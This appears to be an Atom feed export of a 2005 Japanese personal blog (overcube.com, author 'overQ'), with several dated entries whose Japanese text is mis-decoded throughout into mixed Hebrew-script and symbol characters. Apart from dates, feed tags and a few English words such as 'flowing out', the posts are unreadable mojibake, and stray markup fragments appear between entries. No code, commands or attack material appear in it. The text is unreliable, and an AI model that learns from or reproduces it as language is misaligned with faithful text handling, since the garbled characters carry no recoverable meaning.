    -₪¹₪כ₪ָ¡¢ּ₪ֶֻ‏₪כ₪ג₪־₪ֿ¡¢¸«₪¨₪ֶ₪ֿ₪₪₪כ₪±₪ֹ¡¢₪₪ָ₪ף₪ֹ₪ֿ¡ײ°ױ¼±₪·₪ֶ₪₪₪₪₪¡׳¡£²¿₪«ֳם°ױ₪ע´­µ¯₪¹₪כ₪ג₪־₪¬₪¢₪ל₪׀¡־ד₪¨₪׀¡¢¥´¥­¥ײ¥ך₪¬ֶ°₪¯₪ָ₪«₪ֽ¡¢ֵ₪ְ₪«₪י₪½₪ף₪₪³₪ָ₪₪₪₪±₪ֹ¡ִ₪₪₪₪ט₪·®·®¡ֻ¡¢₪½₪³₪ֻ°ױ¼±₪ֿ₪₪₪­₪ֿ₪·₪ֶ₪ג¡¢₪½₪ל°³°₪ַֿשֱ³₪ָ¸«₪ֶ₪₪₪כ¡£

    - -

    ּ₪ֶֻ‏₪כְ₪³¦₪ֿ¡¢ֻ₪₪ֹ₪ַ₪ֿ₪₪¯₪ֶ₪ג¡¢¡ײֶֹ₪א¡׳₪³₪ָ₪ֿ₪ַ₪­₪ֶ¡¢ֹ₪ֻ₪ׂ₪׃₪¬ֶ‏₪ֳ₪ֶ₪₪₪¿₪י¡¢»׀»ץ»ב₪ע»׳₪₪½׀₪·¡¢»׀»ץ»ב₪־´י₪ע»׳₪¦₪ָ¸ֵ´°ֳֻ־ֿ÷₪¬ֿ¢ֱ₪µ₪ל₪כ¡£
    -¸«₪¨₪ֶ₪₪₪כְ₪³¦₪«₪י¼ץ₪±₪כµ₪¬₪הֿ¢ֱ₪ֿ₪¿₪¯₪µ₪ף₪¢₪כ¡£ֶֹ₪ף₪ַ₪₪₪כ¡£₪ַ₪ג¡¢₪ֹ₪¦ֶֹ₪ף₪ַ₪₪₪כ₪«₪ֿ₪«₪₪ך₪¢₪₪₪₪₪¡£
    -¸ְֽױ₪¬₪½₪¦₪ַ₪¢₪כ₪₪י¡¢ֶֹ₪₪ל₪כ₪«₪®₪ך¡¦¸«₪י₪ל₪כ₪«₪®₪ך₪ֲַ¸÷₪¹₪כ₪³₪־ְ₪³¦₪ג¡¢ּµ°ױ¼±₪«₪יְ¸₪¸₪ֶ₪₪₪כ₪־₪ַ₪ֿ₪₪₪₪«¡£

    - -

    ֲח÷ו¥½¥¦¥כ¥׀¥י¡¼¥ֹ2005₪³₪־₪ט₪¦₪ְ₪³¦₪־₪¢₪ך‎₪ע¡¢©¶µ₪ַ₪ֿ¥¢¡¼¥י¥ה¼±₪ָ₪₪₪¦₪־₪ַ₪ֿ₪₪«₪ֳ₪¿₪«¡£
    -¥¢¡¼¥י²°ֹ₪ַ₪ֿ₪₪₪₪־₪ַ₪¢₪ֳ₪ֶ¡¢₪³₪־ְג¼«ֲ־₪גְ₪³¦₪־₪¦₪ֱ₪ֻ´₪₪ל¡¢₪½₪־¾ו¸ְֽױ₪ַ₪ג₪¢₪כ₪־₪ְ₪«₪י¡¢¥¢¡¼¥י¥ה¼±₪ָ₪₪₪¦₪«¡¢ּµ°ױ¼±₪ַ₪¢₪ֳ₪ֶ¡¢₪½₪־₪ט₪¦₪₪³₪ָ₪ָ₪ֿ²¿₪־´״·¸₪ג₪₪₪₪־₪ֻ¡¢÷£₪ױ₪ָ₪ה₪·₪­₪¿₪«₪¸₪ף₪עֿ¢ֱ₪·₪ֶ₪·₪₪ֳ₪¿₪ך₪ג₪·₪ֶ¡₪½₪ל₪ג¥×¥ֽ¥¨¸ְֽױ₪ע¿¿»ק₪ֶ¡¢¥¢¡¼¥י¡¢¥ה¥ְ¥ף¥ֳ₪ָ₪«¸ְ₪ֳ₪ֶ₪₪₪כ¾ץֲײ¡ֻ¡¢₪½₪ף₪»ה₪ֳ₪ֶ₪₪₪ֳ₪¿₪₪¡£
    -»ה₪¸₪ד₪₪₪₪ף₪ְ¡¢»ה₪¸₪ד₪₪₪₪ף₪ְ¡¢ּµ°ױ¼±₪₪ף₪ְ¡£ָ¾ֳ¼₪ֻ±ר₪µ₪ל₪ֶ₪₪₪כ₪»₪₪₪ַ¡¢ְ₪³¦₪־¼ן₪¬ְ¸₪₪ל₪כ₪½₪¦₪ַ₪¹¡£

    - -

    ¡ת₪₪ָ₪ב₪כ

    - -

    ֳ»²־₪ָ₪«ַ׀¶ח₪ָ₪«±׃₪א¿ֽ₪ֳ₪ֶ¡¢flowing out ₪׀₪«₪ך₪¸₪ד₪₪¯¡¢¸ְֽױ₪ע₪·₪ֳ₪«₪ך¶דּ£₪¹₪כ¡£
    -₪½₪־¶דּ£₪ֿ¡¢°ױ¼±ֵ×₪₪ג₪־¡¢₪₪־₪«¡£₪ֹ₪¦₪₪־₪«¡£
    -₪·₪«₪·¡¢°ױ¼±₪ֻ₪ט₪כ¶דּ£₪ֿ¡¢flowing out ₪ֻ¾¡₪ֶ₪כ₪־₪«¡£²¿₪«₪ע¸ל₪ֳ₪¿₪ךְ¸₪½׀₪·₪¿₪ך₪ַ₪­₪כ₪־₪«¡£¹ֽ₪¨₪כ»‏¡¢₪¹₪ַ₪ֻ₪½₪־¹ֽ₪¨₪ֿ¡¢ּµ°ױ¼±ֵ×₪ֿ¢ֱ₪ֻֽך₪ֳ₪ֶ₪₪₪כ₪ַ₪ֿ₪₪₪₪«₪ָ¡¢₪¹₪ַ₪ֻ½ס₪₪₪¿₪ַ₪ֿ₪₪₪₪«¡£
    -·כ¶ֹ¡¢÷ַ½×ֵ×₪ֻ¡¢¡ײ₪³₪־°ל¸ל¡׳₪ע·טִך₪¹₪כ₪־₪ֿ¡¢ּµ°ױ¼±¡£₪½₪ל₪₪י°ל¸ל₪גָ¯₪µ₪₪₪¼ך₪ג₪¢₪כ¡£¥¥±¥ֳ¥ָ¡£

    - -

    ¡ִ₪¢₪¢¡¢₪ג₪¦₪³₪־ױ₪¯₪י₪₪₪₪ַֽט₪כ₪ָ¡¢¼«¬₪ַ₪ג²¿₪ע½ס₪₪₪ֶ₪₪₪כ₪«₪ן₪«₪י₪₪₪₪ַ₪¹¡£
    -₪₪₪ה¡¢¼«¬₪ַ²¿₪ע½ס₪₪₪ֶ₪₪₪כ₪«₪ן₪«₪י₪₪₪₪־₪ֿ¡¢₪ֿ₪¸₪ב₪«₪י₪ְ¡ִ₪ָ₪₪₪¦ֳֿ₪ע½ס₪₪₪ֶ₪₪₪כ₪־₪ְ₪ֳ₪¿₪ֳ₪±¡£₪¸₪ד₪¢¡¢₪³₪־ָ¿¾₪ֿ²¿₪ע°ױּ£₪¹₪כ₪־₪ַ₪·₪ח₪¦¡£¥³¥®¥ָ₪ַ₪·₪ח₪¦₪«¡£₪ן₪«₪י₪₪₪₪ג₪־₪ע₪ן₪«₪ך₪¿₪₪₪ָ¡¢³נ₪¨₪י₪ל₪₪₪ֻ¾₪₪עֻ¾₪א¿´₪ַ₪·₪ח₪¦₪«¡£
    -₪½₪ל₪ָ₪ג¡¢flowing out ¡¿ג₪ל־®₪·¡¢₪ָ₪גּץ₪·₪ֶ₪₪כ¡ֻ₪·₪¿¸ְֽױ₪עִֹ₪₪₪«₪±₪ֶ¡¢₪½₪ל₪ע¼«¬₪ְַ¸₪½׀₪·₪¿₪«₪־₪ט₪¦₪ֻ÷¾¾־₪·₪ט₪¦₪ָ₪·₪ֶ₪₪₪כ₪ף₪ַ₪·₪ח₪¦₪«¡£²¿₪ַ₪¢₪כ₪«₪ג₪ן₪«₪י₪₪₪₪₪¡£

    - -

    ¡ײֹװµ₪ּ£₪־ֳ«¡׳¸½¾₪ֿ¡¢²£¼´₪ֻ¥ך¥¢¥ך¥ֶ¥£₪עֳײ₪­¡¢₪½₪ל₪ֿ₪³₪־ְ₪³¦₪½₪־₪ג₪־₪ֻ₪×₪₪₪ֶ£±£°£°¥ׁ¡¼¥»¥ף¥ָ₪ֻ₪₪כ₪ֿ₪÷₪₪־₪ַ₪¹₪¬¡¢₪¸₪ִ₪ֿ₪³₪־ְ₪³¦₪½₪־₪ג₪־₪ג´°ֱ´₪ֲֻ׀₪·₪ֶ₪ֱ₪ח₪ֳ₪ָ₪ְ₪±ֲ­₪ך₪₪₪₪¿₪ב¡¢¡ײֹװµ₪ּ£₪־ֳ«¡׳₪ֻּµ¸ֲ₪ֻֽמ₪ֱ¹‏₪ף₪ַ₪₪₪¯₪־₪«₪ג₪·₪ל₪₪₪¡£₪₪₪¯¡¢₪־₪«¡£₪₪¼¿¹װ·ֱ₪₪־₪ְ¡¢¼«¬¡£
    -°ל‎¡¢ֳזֵ׃ָ¾ֳ¼₪¾נף₪ְ₪±ֽ¿₪¨₪י₪ל₪¿»‏¡¢¶ץֱ₪¹₪כ₪³₪ָ₪¬½׀ֽט₪כ₪ָ₪₪₪¦¥ז¡¼¥ָ¥װ¥¢₪ֳ₪ֶ¡¢₪₪₪ֳ₪¿₪₪²¿₪₪־₪ְ₪ם₪¦¡£¿ְ¡©

    - -

    ¡ִ₪ָ¡¢¿ג₪ל־®₪µ₪ל₪¿¸ְֽױ₪ע₪א₪ך₪ה₪ך¡¢₪₪ָ₪ב₪כ₪־₪ַ₪¢₪ֳ₪¿(¡¨¡¦¢ֿ¡¦)
    -²¿₪־ֳֿ₪«₪¼₪ף₪¼₪ף₪ן₪«₪י₪₪₪₪ַ₪¹₪¬¡¢ֳֿ¼«ֲ־₪¬₪½₪־¸ְ₪₪ּץ₪ֻ₪ג₪₪ֳ₪ֶ₪ג₪₪₪כ₪־₪ַ₪¹¡£
    -₪ה₪ֳ₪ׁ₪ך¡¢₪ַ₪ג¡¢₪¢₪־¥°¥י¥ױ₪ֶָ±₪¸·ֱ₪־₪ג₪־₪ע¡¢₪ֹ₪³₪«₪ַ¸«₪ֶ₪₪₪כµ₪₪¬₪₪¿₪·₪ֶ₪­₪¿¡£¡£

    ]]> -
    -
    - - ֲחְד₪־₪ׂ₪י₪¬₪₪ײ₪ם₪° - - 2005-12-22T12:55:53Z - 2005-12-22T21:55:53+09:00 - tag:www.overcube.com,2005:/blog//2.677 - 2005-12-22T12:55:53Z - ₪­₪ח₪¦₪ֿ₪×₪×₪ז₪­₪־₪₪₪ֱ₪ֻ₪ֱ₪ַ₪·₪¿¡£ ₪ִ₪ג₪ך₪ֻ₪ִ₪ג₪ך₪₪·₪¿¡£₪ׂ₪כ₪₪ֻ₪ג₪ִ₪ג₪ך₪₪·₪¿¡£₪¢₪µ₪ַ₪«₪±₪כ₪ָ₪­₪ט₪ך¡¢₪ט₪כ₪«₪¨₪ֳ₪ֶ₪­₪¿₪ָ₪­₪־₪₪¦₪¬¡¢₪ג₪ֳ₪ָ₪ִ₪ג₪ֳ₪ֶ₪₪₪₪·₪¿¡£ ₪ָ₪ג₪¢₪ל¡¢₪ט₪¦₪ה₪¯₪₪₪¨₪ֻ₪ִ₪₪₪ֶ¡¢₪₪ֳ₪ָ₪·₪₪·₪¿¡£ ₪¨₪­₪«₪י₪₪₪¨₪₪ַ₪ֿ₪µ₪«₪₪ֱ₪ַ¡¢₪ז₪­₪¬₪³₪×₪ֳ₪ֶ₪₪₪ֶ¡¢₪₪₪ם₪ף₪₪ׂ₪ָ₪¬₪³₪ם₪׃₪₪¯₪ֳ₪ֶ₪₪₪₪·₪¿¡£₪ְ₪ִ₪ך₪ף₪·₪ֶ₪₪₪כ₪¯₪כ₪₪ג₪₪₪·₪¿¡£ ₪₪₪ּ₪ַ₪µ₪¨¡¢₪₪₪ה₪½₪¦₪ֻ₪µ₪ף₪₪·₪ֶ₪₪₪₪·₪¿¡£ ₪₪₪¨₪ֻ₪ִ₪¯₪ָ¡¢₪µ₪ֳ₪½₪¯₪»₪­₪ז₪ױ₪¡₪ף₪ׂ¡¼₪¿¡¼₪ע₪ִ₪±₪ֶ¡¢₪ָ₪ך₪¢₪¨₪÷₪ה₪ױ¡¼₪ֹ₪¦₪¬₪ַ ¡ײ₪¨₪³₪¨₪³₪¢₪¶₪י₪¯¡׳₪ַ₪ג₪₪ט₪¦₪ָ₪×₪ג₪ֳ₪ֶ¡¢₪ׁ₪½₪³₪ף₪ע₪ִ₪±₪₪·₪¿¡£ ₪½₪־₪ָ₪­₪ַ₪·₪¿¡£ ₪װ¡¼¡¢₪װ¡¼¡¢₪װ¡¼¡£ ₪ָ₪¦₪ז₪¬₪₪¯₪₪ך₪₪·₪¿¡£ ₪װ¡¼¡¢₪װ¡¼¡¢₪װ¡¼¡£ ₪ָ₪¦₪ז₪¬₪₪¯₪₪ך₪₪·₪¿¡£ ₪ױ₪¡₪ף₪ֿ₪ׂ₪ו₪כ₪כ₪כ₪כ₪ָ¡¢₪₪µ₪±₪₪₪₪×₪ָ₪ע₪¿₪ֶ₪ֶ¡¢₪ָ₪₪ֳ₪ֶ₪·₪₪₪₪₪·₪¿¡£ ₪״₪ה₪ֿ₪»₪₪₪¸₪ד₪¯₪ָ₪ל₪₪₪­₪¬₪·₪ֿ₪₪₪¹₪כ¡¢₪ל₪₪₪ָ₪¦₪·₪ִ₪־₪ט₪¦₪₪»₪«₪₪₪ֻ¡£ ₪·₪ח₪¦₪¬₪₪₪₪₪¢¡£₪ָ₪¦₪ז₪ע₪₪­₪ו₪¦₪·₪₪±₪ל₪׀₪₪ך₪₪»₪ף¡£₪ַ¡¢ ₪₪ך₪¿₪ף₪¯₪־₪ָ₪³₪ם₪ֻ₪א₪«₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢₪½₪־₪ָ₪­¡¢₪ֿ₪¿₪ָ₪­₪ֵ₪­₪₪·₪¿¡£ ₪ָ₪¦₪ז₪¬¡¢₪₪₪¡£ ₪³₪־₪´₪ם¡¢₪ֱ₪ח₪ֳ₪ָ₪₪₪½₪¬₪·₪«₪ֳ₪¿₪־₪ַ¡¢₪ָ₪¦₪ז₪ע₪«₪¦₪־₪ע₪ן₪¹₪ל₪ֶ₪₪₪¿₪־₪ַ₪¹¡£ ₪¢₪ל₪§¡¢₪ֹ₪¦₪·₪₪·₪ח₪¦¡¡¦e¡¦¡ֻ ₪¬₪½₪ך₪ף₪¹₪¿₪ף₪ֹ₪₪ַ₪ֿ¡¢₪₪₪ֱ₪­₪ם₪¯₪י₪₪₪¢₪כ₪־₪ַ₪¹¡£₪ָ₪×₪₪₪־₪ַ₪¹¡£ ₪¯₪כ₪₪ג₪׀₪₪₪¯₪ג₪ז₪­₪ֻ₪¦₪÷₪ג₪ל₪ֶ₪₪₪כ₪־₪ַ₪¹¡£₪ֱ₪§¡¼₪ף₪ג₪₪₪₪¿₪³₪ָ₪₪₪₪«₪י¡¢₪ה₪ך₪«₪¿₪ג₪ן₪«₪י₪ף₪־₪ַ₪¹¡£ ₪ֱ₪ו₪¦₪·₪ד₪¸₪ח₪¦₪־₪₪¨₪־₪₪ֱ₪ֿ¡¢₪¹₪±¡¼₪ָ₪ך₪ף₪¯₪־₪ט₪¦₪ֻ₪ִ₪כ₪ף₪ִ₪כ₪ף₪ֻ₪³₪×₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪¹¡£ ₪½₪¦₪ְ¡£₪₪₪ֳ₪½₪־₪³₪ָ¡¢₪¹₪­¡¼₪ַ₪¹₪₪ֳ₪ֶ₪₪₪±₪׀₪₪₪₪₪ף₪ְ¡£₪ֱ₪ח₪¦₪ֹ₪µ₪«₪₪ֱ₪ְ₪·¡£ ₪½₪ך₪ג₪₪₪₪₪₪¢¡£₪ג₪¦₪¹₪°₪¯₪ך₪¹₪₪¹₪ְ₪·¡¢₪ָ₪₪«₪₪₪µ₪ף₪¬₪ׂ₪ֳ₪ׁ₪ֳ₪ֶ₪¯₪ל₪כ₪«₪ג₪·₪ל₪₪₪₪¾¡£ ¡ִ₪ְ₪ב₪ְ¡£ ₪­₪׃₪·₪¹₪®₪כ₪²₪ף₪¸₪ִ₪ע₪₪¨₪ֻ¡¢₪¯₪¦₪½₪¦₪־₪»₪«₪₪₪ֻ₪ָ₪¦₪ׂ₪·₪ֶ₪·₪₪₪₪₪·₪¿¡£ ₪ג₪¦₪ְ₪ב₪₪ַ₪¹¡£₪ָ₪¦₪·₪¹₪כ₪·₪«₪₪₪₪־₪ַ₪¹¡£₪ֹ₪¦₪¹₪כ¡¢₪¢₪₪₪ױ₪כ¡£... - - overQ - - - - smile - - -₪ִ₪ג₪ך₪ֻ₪ִ₪ג₪ך₪₪·₪¿¡£₪ׂ₪כ₪₪ֻ₪ג₪ִ₪ג₪ך₪₪·₪¿¡£₪¢₪µ₪ַ₪«₪±₪כ₪ָ₪­₪ט₪ך¡¢₪ט₪כ₪«₪¨₪ֳ₪ֶ₪­₪¿₪ָ₪­₪־₪₪¦₪¬¡¢₪ג₪ֳ₪ָ₪ִ₪ג₪ֳ₪ֶ₪₪₪₪·₪¿¡£

    - -ֲחְד

    - -

    ₪ָ₪ג₪¢₪ל¡¢₪ט₪¦₪ה₪¯₪₪₪¨₪ֻ₪ִ₪₪₪ֶ¡¢₪₪ֳ₪ָ₪·₪₪·₪¿¡£
    -₪¨₪­₪«₪י₪₪₪¨₪₪ַ₪ֿ₪µ₪«₪₪ֱ₪ַ¡¢₪ז₪­₪¬₪³₪×₪ֳ₪ֶ₪₪₪ֶ¡¢₪₪₪ם₪ף₪₪ׂ₪ָ₪¬₪³₪ם₪׃₪₪¯₪ֳ₪ֶ₪₪₪₪·₪¿¡£₪ְ₪ִ₪ך₪ף₪·₪ֶ₪₪₪כ₪¯₪כ₪₪ג₪₪₪·₪¿¡£ -₪₪₪ּ₪ַ₪µ₪¨¡¢₪₪₪ה₪½₪¦₪ֻ₪µ₪ף₪₪·₪ֶ₪₪₪₪·₪¿¡£

    -

    ₪₪₪¨₪ֻ₪ִ₪¯₪ָ¡¢₪µ₪ֳ₪½₪¯₪»₪­₪ז₪ױ₪¡₪ף₪ׂ¡¼₪¿¡¼₪ע₪ִ₪±₪ֶ¡¢₪ָ₪ך₪¢₪¨₪÷₪ה₪ױ¡¼₪ֹ₪¦₪¬₪ַ -¡ײ₪¨₪³₪¨₪³₪¢₪¶₪י₪¯¡׳₪ַ₪ג₪₪ט₪¦₪ָ₪×₪ג₪ֳ₪ֶ¡¢₪ׁ₪½₪³₪ף₪ע₪ִ₪±₪₪·₪¿¡£
    -₪½₪־₪ָ₪­₪ַ₪·₪¿¡£

    -

    ₪װ¡¼¡¢₪װ¡¼¡¢₪װ¡¼¡£
    -₪ָ₪¦₪ז₪¬₪₪¯₪₪ך₪₪·₪¿¡£
    -₪װ¡¼¡¢₪װ¡¼¡¢₪װ¡¼¡£
    -₪ָ₪¦₪ז₪¬₪₪¯₪₪ך₪₪·₪¿¡£

    -

    ₪ױ₪¡₪ף₪ֿ₪ׂ₪ו₪כ₪כ₪כ₪כ₪ָ¡¢₪₪µ₪±₪₪₪₪×₪ָ₪ע₪¿₪ֶ₪ֶ¡¢₪ָ₪₪ֳ₪ֶ₪·₪₪₪₪₪·₪¿¡£ -
    -₪״₪ה₪ֿ₪»₪₪₪¸₪ד₪¯₪ָ₪ל₪₪₪­₪¬₪·₪ֿ₪₪₪¹₪כ¡¢₪ל₪₪₪ָ₪¦₪·₪ִ₪־₪ט₪¦₪₪»₪«₪₪₪ֻ¡£

    -

    ₪·₪ח₪¦₪¬₪₪₪₪₪¢¡£₪ָ₪¦₪ז₪ע₪₪­₪ו₪¦₪·₪₪±₪ל₪׀₪₪ך₪₪»₪ף¡£₪ַ¡¢ -₪₪ך₪¿₪ף₪¯₪־₪ָ₪³₪ם₪ֻ₪א₪«₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢₪½₪־₪ָ₪­¡¢₪ֿ₪¿₪ָ₪­₪ֵ₪­₪₪·₪¿¡£

    -

    ₪ָ₪¦₪ז₪¬¡¢₪₪₪¡£

    -

    ₪³₪־₪´₪ם¡¢₪ֱ₪ח₪ֳ₪ָ₪₪₪½₪¬₪·₪«₪ֳ₪¿₪־₪ַ¡¢₪ָ₪¦₪ז₪ע₪«₪¦₪־₪ע₪ן₪¹₪ל₪ֶ₪₪₪¿₪־₪ַ₪¹¡£ -
    -₪¢₪ל₪§¡¢₪ֹ₪¦₪·₪₪·₪ח₪¦¡¡¦e¡¦¡ֻ
    -₪¬₪½₪ך₪ף₪¹₪¿₪ף₪ֹ₪₪ַ₪ֿ¡¢₪₪₪ֱ₪­₪ם₪¯₪י₪₪₪¢₪כ₪־₪ַ₪¹¡£₪ָ₪×₪₪₪־₪ַ₪¹¡£
    -₪¯₪כ₪₪ג₪׀₪₪₪¯₪ג₪ז₪­₪ֻ₪¦₪÷₪ג₪ל₪ֶ₪₪₪כ₪־₪ַ₪¹¡£₪ֱ₪§¡¼₪ף₪ג₪₪₪₪¿₪³₪ָ₪₪₪₪«₪י¡¢₪ה₪ך₪«₪¿₪ג₪ן₪«₪י₪ף₪־₪ַ₪¹¡£ -₪ֱ₪ו₪¦₪·₪ד₪¸₪ח₪¦₪־₪₪¨₪־₪₪ֱ₪ֿ¡¢₪¹₪±¡¼₪ָ₪ך₪ף₪¯₪־₪ט₪¦₪ֻ₪ִ₪כ₪ף₪ִ₪כ₪ף₪ֻ₪³₪×₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪¹¡£

    -

    ₪½₪¦₪ְ¡£₪₪₪ֳ₪½₪־₪³₪ָ¡¢₪¹₪­¡¼₪ַ₪¹₪₪ֳ₪ֶ₪₪₪±₪׀₪₪₪₪₪ף₪ְ¡£₪ֱ₪ח₪¦₪ֹ₪µ₪«₪₪ֱ₪ְ₪·¡£ -₪½₪ך₪ג₪₪₪₪₪₪¢¡£₪ג₪¦₪¹₪°₪¯₪ך₪¹₪₪¹₪ְ₪·¡¢₪ָ₪₪«₪₪₪µ₪ף₪¬₪ׂ₪ֳ₪ׁ₪ֳ₪ֶ₪¯₪ל₪כ₪«₪ג₪·₪ל₪₪₪₪¾¡£

    -

    ¡ִ₪ְ₪ב₪ְ¡£
    -₪­₪׃₪·₪¹₪®₪כ₪²₪ף₪¸₪ִ₪ע₪₪¨₪ֻ¡¢₪¯₪¦₪½₪¦₪־₪»₪«₪₪₪ֻ₪ָ₪¦₪ׂ₪·₪ֶ₪·₪₪₪₪₪·₪¿¡£
    -₪ג₪¦₪ְ₪ב₪₪ַ₪¹¡£₪ָ₪¦₪·₪¹₪כ₪·₪«₪₪₪₪־₪ַ₪¹¡£₪ֹ₪¦₪¹₪כ¡¢₪¢₪₪₪ױ₪כ¡£

    -]]> - ¡ִ₪ָ₪ג₪«₪¯¡¢₪¢₪כ₪₪₪ֶ₪₪₪¯₪³₪ָ₪ֻ₪·₪₪·₪¿¡£₪½₪ל₪·₪«¡¢₪₪₪­₪־₪׃₪כ₪₪ֱ₪ֿ¡¢₪₪₪₪־₪ַ₪¹¡£ -
    -₪ג₪¦₪¹₪ֳ₪«₪ך₪ׂ₪¬₪¯₪ל₪ֶ₪₪₪₪¹¡£₪₪ֱ₪ֿ₪₪¹₪₪¹₪³₪×₪ֳ₪ֶ₪₪₪₪¹¡£₪ִ₪כ₪ִ₪כ₪װ₪«₪װ₪«¡£
    -₪₪₪­₪ֿ₪₪ְ₪ט₪₪₪־₪ַ₪¹¡£₪«₪¨₪ך₪¬₪ג₪ף₪ְ₪₪¡£18₪ך₪ֳ₪ָ₪כ₪־₪₪ך₪¿₪ף₪¯₪ֿ¡¢₪¹₪ף₪²¡¼₪×₪ג₪₪₪־₪ַ₪¹¡£

    -

    ¢צ₪ז¡ֱ₪­₪־₪ױ₪כ¡¢₪₪ֱ₪ע¡ֱ¡₪ְ₪׀₪ְ₪׀¡ֱ¡ֻ

    -

    ₪ֶ₪₪₪×₪ף₪ַ₪ֿ₪₪¦₪¿₪ע₪¦₪¿₪₪₪₪¬₪י¡¢₪ָ₪₪ָ₪₪ָ₪¢₪כ₪₪₪ֶ₪₪₪­₪₪·₪¿¡£ -₪¯₪י₪₪₪¦₪¿₪₪־₪ַ₪¹¡£₪³₪¦₪³₪¦₪־₪»₪ף₪ׁ₪₪₪¬¡¢₪ז₪­₪ָ₪₪₪¦₪×₪ף₪₪־₪ׂ₪ָ₪ֻ₪ױ₪י₪ל₪¿₪ָ₪­¡¢₪ט₪¯₪³₪־₪¦₪¿₪ע₪¦₪¿₪ֳ₪ֶ₪₪₪₪·₪¿¡£ -₪¢₪־₪³₪ם₪ג₪ױ₪ז₪ַ₪·₪¿¡£₪ן₪ל₪ן₪ל₪³₪¦₪ֿ₪₪₪ֿ¡¢¡ײ₪ְ₪׀₪ְ₪׀¡ֱ¡׳₪ָ₪₪₪¦₪³¡¼₪י₪¹₪ע₪¿₪ף₪ָ₪¦₪·₪ֶ₪₪₪₪·₪¿¡£

    -

    ¡ִ₪½₪ל₪ֿ¡¢₪ֹ₪¦₪ַ₪ג₪₪₪₪₪³₪ָ₪ַ₪·₪¿¡£
    -₪ָ₪ג₪«₪¯¡¢₪¢₪כ₪₪₪ֶ¡¢₪ָ₪¦₪ז₪ע₪«₪₪₪ֻ₪₪₪ֳ₪¿₪־₪ַ₪¹¡£₪ָ₪×₪«₪ֳ₪¿₪ַ₪¹¡£₪µ₪א₪«₪ֳ₪¿₪ַ₪¹¡£₪ם₪ב₪ף₪ֿ₪ִ₪כ₪ִ₪כ₪¹₪₪¹₪¡£₪₪ֱ₪ֿ₪·₪ם₪¬₪ֽ¡£

    -

    ₪ַ₪ג¡¢₪ט₪¦₪ה₪¯₪¬₪½₪ך₪ף₪¹₪¿₪ף₪ֹ₪₪ַ₪ָ₪¦₪¿₪ִ₪·₪₪·₪¿¡£₪½₪³₪ַ¡¢₪ױ₪ָ₪µ₪ָ₪ך₪₪·₪¿¡£
    -18₪ך₪ֳ₪ָ₪כ₪₪ף₪¿₪ף₪ֻ₪·₪₪¯₪ֶ₪ג¡¢5₪ך₪ֳ₪ָ₪כ₪¯₪י₪₪₪«₪¨₪׀¡¢₪₪₪₪₪ף₪ְ¡¢₪ָ¡£
    -₪₪ף₪ֶ₪¢₪¿₪₪¬₪₪₪₪₪ף₪ַ₪·₪ח₪¦¡¡¦e¡¦¡ֻ
    -5₪ך₪ֳ₪ָ₪כ₪₪י¡¢₪י₪¯₪·₪ח₪¦₪ַ₪ג₪ֳ₪ֶ₪«₪¨₪ל₪₪¹¡£₪ֿ₪ֿ₪ֿ₪ֿ₪ֿ¡£₪«₪ֳ₪¿₪¡£₪₪ֻ₪ֻ¡£

    -

    ₪«₪¨₪ך₪ֿ₪ֿ₪₪¦₪¿₪ג₪«₪¨₪₪·₪¿¡£₪ז¡ֱ₪­₪ה¡¢₪³₪ף₪³₪ף¡¢₪ֻ₪·₪₪·₪¿¡£₪₪₪ּ₪ג₪ט₪ם₪³₪׃₪ֻ₪ן₪«₪±₪₪ן₪כ¡£
    -₪¦₪ל₪·₪¬₪ֳ₪ֶ¡¢₪÷₪ף₪÷₪ף₪¢₪כ₪₪₪¿₪»₪₪₪ַ¡¢₪µ₪ף₪«₪₪¡¢₪³₪±₪₪·₪¿¡£₪ֶ₪ע₪ִ₪₪₪¿₪ָ₪­¡¢₪ז₪׃₪־₪ִ₪ב₪¬₪ן₪ל₪₪·₪¿¡£₪ִ₪ב₪¿₪₪₪־₪ַ¡¢₪₪₪¿₪₪ג₪«₪ף₪¸₪₪»₪ף₪ַ₪·₪¿¡£₪«₪¨₪ֳ₪ֶ₪₪כ₪ָ¡¢₪ָ₪ֳ₪ֶ₪־₪ָ₪³₪ם₪¬¡¢₪ֱ₪₪₪ל₪ַ₪·₪¿¡£
    -₪ַ₪ג¡¢₪ָ₪¦₪ז₪ֿ₪·₪·₪ו₪·₪¿¡£

    -

    ₪³₪ל₪ַ¡¢₪₪₪­₪־₪׃₪י₪ל₪₪¹¡£₪µ₪׀₪₪₪׀₪כ₪₪ׂ₪׃₪¬₪ִ₪ֵ₪­₪₪¹¡£₪₪ף₪₪ג₪¬₪ף₪׀₪ֳ₪ֶ¡¢₪₪₪­₪־₪׃₪ֶ₪¯₪ְ₪µ₪₪₪ֽ¡£

    -

    ₪¨₪³₪¨₪³₪¢₪¶₪י₪¯¡¢₪¨₪³₪¨₪³₪¶₪ב₪י₪¯¡ִ

    ]]> -
    -
    - - ²°÷¬₪־¾ו₪־¿ְֽֽ - - 2005-12-16T11:05:49Z - 2005-12-16T20:05:49+09:00 - tag:www.overcube.com,2005:/blog//2.674 - 2005-12-16T11:05:49Z - ְ¾¿״³¦·¨₪עג₪¯₪ָ¡¢ִ®²°₪־²°÷¬₪־¾ו₪ֻ₪ֿ¡¢₪³₪־₪ט₪¦₪ֻ¾®₪µ₪¿ְֽֽ₪¬₪₪₪ֶ¡¢²ָ₪ע¼י₪ֳ₪ֶ₪₪₪₪¹¡£ ¾בסִ¡₪·₪ח₪¦₪­¡ֻ₪µ₪ ₪ָ₪₪₪¦₪½₪¦₪ַ₪¹¡£°ל²ָ₪ֻ₪ׂ₪ָ₪ך₪־¼י₪ך¿ְ¡£ִ¹₪₪₪×ֹ¦₪¬¥ָ¥ל¡¼¥ֹ¥¡¼¥¯¡£ °ל¸®°ל¸®₪ַ₪½₪ל₪¾₪ל₪־¾בסִ₪µ₪¡ָשּ¯₪ֻ»ׁ₪«₪¿₪ֱ₪¬₪ֱ₪¬₪¦¡ֻ¡£ ¡ײ´¨₪₪₪־₪ֻ₪¿₪₪₪״₪ף₪ַ₪¹₪ֽ¡׳ ¡ײ₪×₪¦¡£ֹ¦₪¬ִ¹₪₪₪־₪ַ₪¢₪¿₪¿₪«₪¸₪ד¡£¥½¥ך₪ֻ¾ט₪ֳ₪¿ֶמָ₪־ְײ₪₪¥ה¥ִ₪ג¡¢₪ן₪·₪ע¿¿»ק₪ֶ¿­₪׀₪·₪ֶ₪×₪כ₪¸₪ד₪ם₪¦¡׳ 